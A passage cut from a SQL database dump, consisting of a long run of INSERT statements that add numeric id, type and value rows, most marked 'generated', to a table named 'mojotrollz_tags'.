`comment`) VALUES (4280, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4281, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4281, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4282, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4282, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4283, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4283, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4283, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4284, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4284, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4285, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4285, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4286, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4286, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4286, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4287, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4287, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4287, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4288, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4288, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4288, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4289, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4289, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4289, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4290, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4290, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4290, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4291, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4291, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4291, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4292, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4292, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4292, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4293, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4294, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4294, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4294, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4295, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4295, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4295, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4296, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4296, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4296, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4297, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4297, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4297, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4298, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4298, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4298, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4299, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4299, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4299, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4300, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4300, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4300, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4301, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4301, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4301, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4302, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4302, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4302, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4303, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4303, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4303, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4304, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4304, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4304, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4305, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4305, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4306, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4306, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4306, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4307, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4307, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4308, 1, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4308, 1, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4308, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4309, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4309, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4310, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4310, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4311, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4311, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4311, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4311, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4311, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4311, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4312, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4312, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4314, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4314, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4316, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4316, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4316, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4316, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4316, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4317, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4317, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4319, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4319, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4320, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4320, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4321, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4321, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4323, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4323, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4324, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4324, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4328, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4328, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4329, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4329, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4331, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4331, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4334, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4334, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4339, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4339, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4341, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4341, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4342, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4343, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4343, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4344, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4344, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4345, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4345, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4346, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4346, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4347, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4347, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4348, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4348, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4351, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4351, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4352, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4352, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4355, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4356, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4356, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4357, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4357, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4358, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4359, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4359, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4360, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4361, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4361, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4362, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4362, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4363, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4363, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4364, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4364, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4366, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4366, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4368, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4368, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4370, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4370, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4371, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4371, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4374, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4374, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4376, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4376, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4377, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4378, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4378, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4379, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4379, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4380, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4380, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4382, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4382, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4385, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4385, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4386, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4387, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4387, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4388, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4388, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4389, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4389, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4390, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4390, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4391, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4392, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4393, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4393, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4394, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4394, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4396, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4397, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4397, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4398, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4399, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4400, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4401, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4401, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4402, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4403, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4403, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4404, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4404, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4405, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4407, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4407, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4408, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4409, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4409, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4410, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4411, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4412, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4412, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4413, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4414, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4414, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4415, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4415, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4416, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4416, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4416, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4417, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4417, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4417, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4418, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4418, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4418, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4419, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4419, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4420, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4420, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4420, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4421, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4421, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4421, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4422, 1, 1, 47, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (4422, 1, 2, 491, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) 